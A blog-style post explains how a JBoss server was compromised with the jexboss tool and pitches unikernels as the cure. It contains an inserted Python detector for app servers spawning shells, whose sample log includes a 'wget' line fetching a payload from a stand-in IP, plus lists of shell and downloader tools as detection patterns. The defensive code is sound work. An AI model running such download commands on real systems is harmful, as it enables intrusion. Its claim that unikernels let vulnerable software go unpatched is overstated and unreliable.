Understanding Ransomware

Intro

I wanted to talk a little bit about the latest ransomware going around.

Some people think that data breaches and getting hacked are inevitable - but the truth is "Hackers aren’t acts of god - they’re just assholes."

So I wanted to show you how these hackers actually work.

Mr. hacker first identifies a vulnerable piece of software.

In this case he picks on jboss which isn’t even the name of the software anymore - which tells you how old this particular installation is.

He then scans the internet looking for vulnerable servers - finds a few and gets lucky.

In hacker parlance we call this process banner-grabbing.

From then on it’s relatively straightforward for him to attack and it can happen in minutes. Let’s dissect those few minutes though because they are super important.

This particular attack was using a program called jexboss.

You can actually find this on github - you know the company microsoft just bought for 7.5B dollars?

WHAT’S A SHELL?

The exploit will at first try to launch what is called a shell.

The shell is the little black box you might see a developer staring at all day.

The shell allows the attacker to do a few things:

  • Download new software to help him in his attack.
  • Run other programs on that system that aren’t intended to run.
  • Serve as a launching platform to attack other systems on the ‘trusted’ network.

The reason he can do all of this is because the operating systems we use today - namely windows and linux are designed to run multiple programs for multiple users.

This is all fine for end-users on laptops and phones but is absolutely not what we want in a server environment. Indeed developers go out of their way to isolate programs from each other in server environments as is.

Point 2 is a major problem though - why would you let an attacker run his software on your computer to begin with? What went wrong? Why is this even possible?
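The three bullet points above are exactly what a defender looks for on an application server: the server process spawning a shell, and that shell then fetching new tooling. The following is an added example (not code from the original post, jexboss, or JBoss) showing a minimal detection over constructed process-creation events; the log format, host name, pids and the IP address are all made up for the example.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (invented for this example; not real
# JBoss, jexboss or EDR output). Each line records one process start with its
# pid, parent pid, executable name and command line.
SAMPLE_EVENTS = """\
ts=2018-06-05T10:01:02Z host=app01 user=jboss pid=100 ppid=1 name=java cmd="java -jar standalone.jar"
ts=2018-06-05T10:01:05Z host=app01 user=jboss pid=101 ppid=100 name=sh cmd="/bin/sh -c id"
ts=2018-06-05T10:01:09Z host=app01 user=jboss pid=102 ppid=101 name=wget cmd="wget http://203.0.113.7/stage.bin"
ts=2018-06-05T10:01:12Z host=app01 user=jboss pid=103 ppid=101 name=chmod cmd="chmod +x stage.bin"
ts=2018-06-05T10:02:00Z host=app01 user=root pid=200 ppid=1 name=cron cmd="/usr/sbin/cron"
ts=2018-06-05T10:02:01Z host=app01 user=root pid=201 ppid=200 name=sh cmd="/bin/sh /etc/cron.hourly/logrotate"
ts=2018-06-05T10:02:02Z host=app01 user=root pid=202 ppid=201 name=curl cmd="curl -s http://localhost:8080/health"
"""

# Process names an application server runs as, the shells it should never
# spawn, and tools an attacker typically uses to pull down more software.
APP_SERVERS = {"java"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
DOWNLOADERS = {"wget", "curl", "certutil.exe", "bitsadmin.exe"}

# key=value pairs; a value may be a double-quoted string containing spaces.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line):
    """Turn one log line into a dict, stripping quotes from quoted values."""
    fields = {}
    for key, value in KV_RE.findall(line):
        if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            value = value[1:-1]
        fields[key] = value
    return fields


@dataclass
class Finding:
    ts: str
    rule: str
    cmd: str


def detect(events_text):
    """Flag shells spawned by the app server and downloads run from them.

    Parent names are resolved through the pid table built from earlier
    events, so a shell started by cron (same name, different parent) does
    not trigger either rule.
    """
    procs = {}       # pid -> process name, learned as events arrive
    tainted = set()  # pids of shells spawned directly by the app server
    findings = []
    for raw in events_text.splitlines():
        ev = parse_event(raw)
        if not ev:
            continue
        pid, ppid, name = ev["pid"], ev["ppid"], ev["name"]
        procs[pid] = name
        parent_name = procs.get(ppid, "?")
        if parent_name in APP_SERVERS and name in SHELLS:
            tainted.add(pid)
            findings.append(Finding(ev["ts"], "app-server-spawned-shell", ev["cmd"]))
        elif ppid in tainted and name in DOWNLOADERS:
            findings.append(Finding(ev["ts"], "shell-from-app-server-fetched-tool", ev["cmd"]))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.ts} {f.rule}: {f.cmd}")
```

On the constructed sample this reports two findings: the `java` process spawning `/bin/sh`, and that shell running `wget`. The cron-driven shell and its `curl` health check are ignored because their parent chain never passes through the application server. Real deployments would feed this from auditd, Sysmon or an EDR rather than a string, but the parent/child logic is the same.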

HISTORY

For that we have to rewind almost 50 years. The general purpose operating systems we use today share the same operating system characteristics that were built for very old computers like the pdp-7 and pdp-11. These systems were designed for multiple users and, by extension, multiple programs.

The machines were just too damn big and too damn expensive. They had to run multiple programs.

Fast forward almost 50 years to today and developers go out of their way to isolate programs from each other - mainly because of manageability reasons - they’re used to working with tens to hundreds or even thousands of virtual machines.

The key part here though is virtual. You see - in today’s world whether you are public cloud, private cloud, or somewhere in between with hybrid you probably have a lot of virtualized servers.

AHA

So we don’t need this concept of one server running all of the software for multiple people on one machine - you simply can’t do that anymore even if you wanted to - there’s too much.

Unikernels prevent ransomware attacks like this. Unikernels run one application in one VM with no general purpose operating system like linux or windows.

There is no way to pop into the host. There is no concept of users. There is no shell. There isn’t even a way to spawn a shell because the system simply doesn’t have the facilities to do so.

It’s like having a house instead of an apartment complex.

What’s really interesting is that you could forklift a completely vulnerable JBoss application into a unikernel and you don’t have to deal with patch management time and cost. Keeping your software up to date is definitely best practice but let’s face reality - you’re too busy, there’s too much software and you just don’t know what’s out there.

Unikernels don’t stop all security problems but they do stop ransomware attacks like this and they do stop assholes.

Ready for the future cloud?

Of course you are - otherwise you wouldn't be reading this. Want to see a real live remote root exploit stopped in its tracks while Google, Amazon, OpenStack and others eagerly allow jerks to steal your company's data? Ever seen a thousand VMs running on one server? Ready to see the future?
